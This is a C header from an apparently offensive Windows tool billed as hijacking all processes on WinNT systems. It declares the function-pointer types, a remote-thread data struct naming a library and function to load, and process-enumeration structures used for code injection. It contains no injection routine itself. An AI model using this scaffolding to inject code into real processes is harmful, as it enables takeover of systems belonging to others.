/*
        ______            _  _   __            _ 
        | ___ \          | || | / /           | |
        | |_/ /  ___   __| || |/ /   ___    __| |
        |    /  / _ \ / _` ||    \  / _ \  / _` |
        | |\ \ |  __/| (_| || |\  \| (_) || (_| |
        \_| \_| \___| \__,_|\_| \_/ \___/  \__,_|
                                          
            Hijack All Process On WinNT Systems
		      Version 0.1

                                      RedKod Team
                                    www.redkod.com
Coder: R-e-D
Mail : r-e-d@redkod.com

*/

#ifndef _patch0r_
#define _patch0r_

#define WIN32_LEAN_AND_MEAN

#define SystemProcessInformation 5
#define STATUS_INFO_LEN_MISMATCH 0xc0000004
#define MAXINJECTSIZE 4096

/* All typedef */
typedef unsigned long NTSTATUS;
typedef HMODULE (__stdcall *ptLoadLibraryA)(char *);
typedef HMODULE (__stdcall *ptGetModuleHandleW)(char *);
typedef FARPROC (__stdcall *ptGetProcAddress)(HMODULE, char *);
typedef BOOL    (__stdcall *ptFreeLibrary)(HMODULE);
typedef NTSTATUS (__stdcall *NtQuerySystemInformation)(DWORD  SystemInformationClass,
						       BYTE*  SystemInformation,
						       DWORD  SystemInformationLength,
						       DWORD* ReturnLength);

struct RemoteThreadData
{
	/* LoadLibrary function address */
	ptLoadLibraryA		fnLoadLibrary;
	/* GetModuleHandleW function address */
	ptGetModuleHandleW	fnGetModuleHandle;
	/* FreeLibrary function address */
	ptFreeLibrary		fnFreeLibrary;
	/* GetProcAddress function address */
	ptGetProcAddress	fnGetProcAddress;

	HMODULE hModule;

	/* Library Name */
	char				imported_lib[_MAX_PATH];
	/* Function Name */
	char				imported_function[256];

	/* Option ... */
	LPVOID options[256];
};

typedef struct {
  unsigned short Length;
  unsigned short MaxLen;
  unsigned short *Buffer;
} UNICODE_STRING;

struct process_info {
  unsigned long NextEntryDelta;
  unsigned long ThreadCount;
  unsigned long Reserved1[6];
  LARGE_INTEGER CreateTime;
  LARGE_INTEGER UserTime;
  LARGE_INTEGER KernelTime;
  UNICODE_STRING ProcessName;
  unsigned long BasePriority;
  unsigned long ProcessId;
};


#endif